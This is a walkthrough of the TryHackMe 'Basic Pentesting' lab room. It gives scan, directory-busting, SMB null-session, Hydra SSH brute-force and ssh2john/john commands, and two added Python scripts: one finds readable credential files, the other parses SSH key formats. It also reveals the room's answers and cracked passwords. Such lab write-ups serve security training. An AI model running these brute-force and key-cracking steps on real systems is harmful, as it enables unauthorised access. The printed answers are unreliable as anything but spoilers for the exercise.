TryHackMe: Basic Pentesting
In this set of tasks you’ll learn the following:
- brute forcing
- hash cracking
- service enumeration
- Linux enumeration
Now Let’s Begin 🚀
1. Deploy the machine and connect to our network
As simple as it sounds: click the “Start Machine” button at the top right of the task.
2. Reconnaissance
The first step is an nmap scan:
sudo nmap -Pn -A -sSV 10.10.11.29
-Pn skips host discovery and scans the host even if it does not answer ping, -sS is a SYN scan (it needs root, hence sudo), and -A turns on version detection, OS detection, default scripts and traceroute, so the V in -sSV is already covered by -A.
The scan shows the services we care about:
* SSH on port 22
* HTTP on port 80
* Samba (SMB) on ports 139 and 445
These three are all we need for this box.
3. What is the name of the hidden directory on the web server (enter name without /)?
Open http://[Your_Target_IP] in a web browser.
To find hidden directories on the web app we can use dirb, gobuster or any similar tool.
# for dirb use:
dirb http://[Your_Target_IP]
# for gobuster use:
gobuster dir -u http://[Your_Target_IP] -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
Here I used dirb, and the results show the directory we are after: /development
Let’s check the contents of the two text files in /development (dev.txt and j.txt).
Both files are short notes signed -K and -J. From them we learn the following:
* There are at least two users, K and J (initials, not the real usernames yet)
* Apache is set up (the notes mention version 2.5.12)
* The server also runs SMB (Samba)
* User J has a weak password (the most important point: K’s note to J says the password hash was cracked easily)
Answer: development
4. User brute-forcing to find the username & password
# Method 1
Let’s start by enumerating SMB with enum4linux:
enum4linux -a 10.10.11.29
# Method 2
SMB enumeration with the Nmap Scripting Engine (NSE). The smb-enum-* scripts live in /usr/share/nmap/scripts; to gather as much information as possible we can run all of them at once (quote the glob so the shell does not expand it against files in the current directory):
nmap -p 139,445 --script='smb-enum*' <ip-addr>
The output lists an Anonymous share and the IPC$ share. IPC$ is the share SMB uses for inter-process communication (named pipes); the important finding is that the server accepts a null session, i.e. a login with no username and no password. So we can connect to the Anonymous share with smbclient (its -N flag skips the password prompt) and list its contents.
staff.txt might contain something useful, so download it with get staff.txt.
staff.txt names Kay and Jan, which matches the K and J from the dev notes, so we now have two usernames: jan and kay. SSH is open and K’s note in j.txt says jan’s password was easy to crack, so let’s brute-force jan’s SSH login with Hydra and rockyou.txt. The -t 4 caps the number of parallel connections, because most SSH servers drop connections when hydra opens too many at once (hydra itself prints a warning recommending -t 4 for SSH):
hydra -l jan -P /usr/share/wordlists/rockyou.txt -t 4 ssh://<ip-addr>
What is the username?
Answer: jan
What is the password?
Answer: armando
5. What service do you use to access the server(answer in abbreviation in all caps)?
Let’s log in to the server as jan over SSH with the credentials we just cracked.
Answer: SSH
6. Enumerate the machine to find any vectors for privilege escalation.
We are in as jan. Now let’s explore the machine, in particular Kay’s home directory. It contains a password backup file, pass.bak, but jan cannot read it, and jan has no sudo rights either.
To read that backup we have to escalate to kay. Looking further through Kay’s directories, /home/kay/.ssh holds an SSH key pair, and the private key id_rsa is readable by jan.
Save the private key on your machine in a file with nano or any other editor you like, or transfer it with scp or rsync. If you intend to use the copy from your own machine, chmod 600 it first: ssh refuses to load a private key whose permissions are too open.
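The search through Kay’s home directory can be automated. The script below is an added example (my own code, not from the room or from any enumeration tool): it walks a directory tree, picks out files whose names look like credentials (private keys, *.bak, pass*, *.pem; the name pattern is my own choice), and splits them into those readable by any local user and those that exist but are protected, the second list being what to come back for after escalating. demo() builds a constructed home-directory look-alike that mirrors the situation in the room: a world-readable id_rsa next to an owner-only pass.bak.

```python
import os
import re
import stat
import tempfile

# File names worth a second look during enumeration (assumption: my own list).
SECRET_NAME = re.compile(
    r"^id_(rsa|dsa|ecdsa|ed25519)$|\.bak$|^pass(wd|word)?(\.|$)|\.pem$", re.I)


def classify_secrets(root, pattern=SECRET_NAME):
    """Walk root and split matching regular files into those readable by
    'other' (mode bit o+r, so any local account such as jan can cat them) and
    those that exist but are protected. Returns (readable, protected), both
    as sorted paths relative to root."""
    readable, protected = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not pattern.search(name):
                continue
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue                      # vanished or unreadable entry
            if not stat.S_ISREG(st.st_mode):
                continue                      # skip symlinks, sockets, ...
            rel = os.path.relpath(path, root)
            (readable if st.st_mode & stat.S_IROTH else protected).append(rel)
    return sorted(readable), sorted(protected)


def _put(root, rel, mode, content=b"x"):
    """Create a file with an explicit mode so the umask does not matter."""
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(content)
    os.chmod(path, mode)


def demo():
    """Build a constructed /home look-alike and enumerate it."""
    with tempfile.TemporaryDirectory() as home:
        _put(home, "kay/.ssh/id_rsa", 0o644)      # the misconfiguration: world-readable key
        _put(home, "kay/.ssh/id_rsa.pub", 0o644)  # public key, not a secret (no match)
        _put(home, "kay/pass.bak", 0o600)         # owner-only: come back after privesc
        _put(home, "bob/.ssh/id_rsa", 0o600)      # correctly protected key
        _put(home, "jan/notes.txt", 0o644)        # not a credential-looking name
        return classify_secrets(home)


if __name__ == "__main__":
    readable, protected = demo()
    print("readable now:", readable)
    print("protected, revisit after privesc:", protected)
```

On the target you would call classify_secrets("/home") from jan’s shell. The check is on the mode bits (S_IROTH), which is what ls -l shows, rather than on whether the current process can open the file, so the result is the same whichever user runs it.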
Now run ssh2john to turn the key into a hash that john can work on:
python3 /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
This converts the encrypted private key into john’s format (the output is a hash line; nothing is decrypted yet). Then crack the passphrase with rockyou.txt:
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
john recovers the passphrase: beeswax
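What ssh2john actually does is pull out of the key file the pieces john needs, and which pieces those are depends on the key’s format. The script below is an added example (my own code, not ssh2john’s or john’s): it parses both formats, the legacy PEM key (banner BEGIN RSA PRIVATE KEY with Proc-Type and DEK-Info headers, where the cipher key comes from a single MD5 pass over passphrase and salt) and the newer openssh-key-v1 format (banner BEGIN OPENSSH PRIVATE KEY, where bcrypt_pbkdf with a configurable round count is used), reports cipher, salt and KDF rounds, and implements the legacy key derivation. The two sample keys are constructed for the demo with filler ciphertext; the IV, salt and round values are made up. john’s own $sshng$ hash-line syntax is deliberately not reproduced.

```python
import base64
import hashlib
import struct

def _ssh_string(b):
    """Encode bytes as an SSH wire-format string: uint32 big-endian length + payload."""
    return struct.pack(">I", len(b)) + b

def _read_ssh_string(buf, off):
    """Decode an SSH wire-format string at offset off; return (payload, next offset)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n

def parse_legacy_pem(text):
    """Legacy 'BEGIN RSA PRIVATE KEY' with Proc-Type/DEK-Info headers. The cipher
    key is derived with OpenSSL's EVP_BytesToKey (chained MD5, one round);
    the salt is the first 8 bytes of the IV given in DEK-Info."""
    headers, body = {}, []
    for line in (l.strip() for l in text.strip().splitlines()[1:-1]):
        if ":" in line and not body:
            k, v = line.split(":", 1)
            headers[k.strip()] = v.strip()
        elif line:
            body.append(line)
    if headers.get("Proc-Type") != "4,ENCRYPTED":
        return {"format": "legacy-pem", "encrypted": False}
    cipher, iv_hex = headers["DEK-Info"].split(",")
    return {"format": "legacy-pem", "encrypted": True, "cipher": cipher,
            "kdf": "EVP_BytesToKey-MD5", "rounds": 1, "salt": iv_hex[:16].lower(),
            "ciphertext_len": len(base64.b64decode("".join(body)))}

def parse_openssh_v1(text):
    """'BEGIN OPENSSH PRIVATE KEY' (openssh-key-v1): after the magic come the
    cipher name, KDF name and KDF options; bcrypt options hold salt + rounds."""
    blob = base64.b64decode("".join(text.strip().splitlines()[1:-1]))
    magic = b"openssh-key-v1\x00"
    if not blob.startswith(magic):
        raise ValueError("not an openssh-key-v1 blob")
    cipher, off = _read_ssh_string(blob, len(magic))
    kdf, off = _read_ssh_string(blob, off)
    kdfopts, off = _read_ssh_string(blob, off)
    if kdf == b"none":
        return {"format": "openssh-v1", "encrypted": False}
    salt, o = _read_ssh_string(kdfopts, 0)
    (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
    return {"format": "openssh-v1", "encrypted": True, "cipher": cipher.decode(),
            "kdf": kdf.decode() + "_pbkdf", "rounds": rounds, "salt": salt.hex()}

def parse_private_key(text):
    """Dispatch on the PEM banner. This is the ssh2john step minus john's own
    hash-line syntax, which is deliberately not reproduced here."""
    first = text.strip().splitlines()[0]
    if "OPENSSH PRIVATE KEY" in first:
        return parse_openssh_v1(text)
    return parse_legacy_pem(text)

def evp_bytes_to_key(passphrase, salt, key_len):
    """OpenSSL legacy KDF with count=1: D_i = MD5(D_{i-1} || passphrase || salt),
    concatenated until key_len bytes. One MD5 per candidate is why a wordlist
    run against a legacy-format key finishes in seconds."""
    out, prev = b"", b""
    while len(out) < key_len:
        prev = hashlib.md5(prev + passphrase + salt).digest()
        out += prev
    return out[:key_len]

# Constructed sample keys: the base64 body is filler bytes, not a real key.
LEGACY_SAMPLE = "\n".join([
    "-----BEGIN RSA PRIVATE KEY-----",
    "Proc-Type: 4,ENCRYPTED",
    "DEK-Info: AES-128-CBC,0F1E2D3C4B5A69788796A5B4C3D2E1F0",  # made-up IV
    "",
    base64.b64encode(bytes(range(64))).decode(),
    "-----END RSA PRIVATE KEY-----",
])

def build_v1_sample(salt=b"\x11" * 16, rounds=16):
    """Assemble a minimal openssh-key-v1 blob with bcrypt KDF options (made-up values)."""
    blob = (b"openssh-key-v1\x00"
            + _ssh_string(b"aes256-ctr")
            + _ssh_string(b"bcrypt")
            + _ssh_string(_ssh_string(salt) + struct.pack(">I", rounds))
            + struct.pack(">I", 1)                 # number of keys
            + _ssh_string(b"public-key-filler")
            + _ssh_string(b"\x00" * 32))           # encrypted section, filler
    b64 = base64.b64encode(blob).decode()
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n-----END OPENSSH PRIVATE KEY-----\n" % b64

V1_SAMPLE = build_v1_sample()
```

The practical caveat: if the key you saved has the legacy headers, each candidate passphrase costs one MD5 and rockyou.txt is exhausted in seconds; if it is an openssh-key-v1 key, each candidate costs the configured number of bcrypt rounds and the same wordlist takes orders of magnitude longer, so the passphrase had better be a weak one for this step to work.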
Accessing as kay
Run this from jan’s shell on the target, where the key already sits with the right permissions (the copy on your own machine works too once it has been chmod 600; without that, ssh rejects the key). The syntax is as follows:
ssh -i /home/kay/.ssh/id_rsa kay@[TARGET_MACHINE_IP]
7. What is the name of the other user you found (all lowercase)?
Answer: kay
8. What is the final password you obtain?
Finally, as kay, cat the pass.bak file in Kay’s home directory to obtain the last password.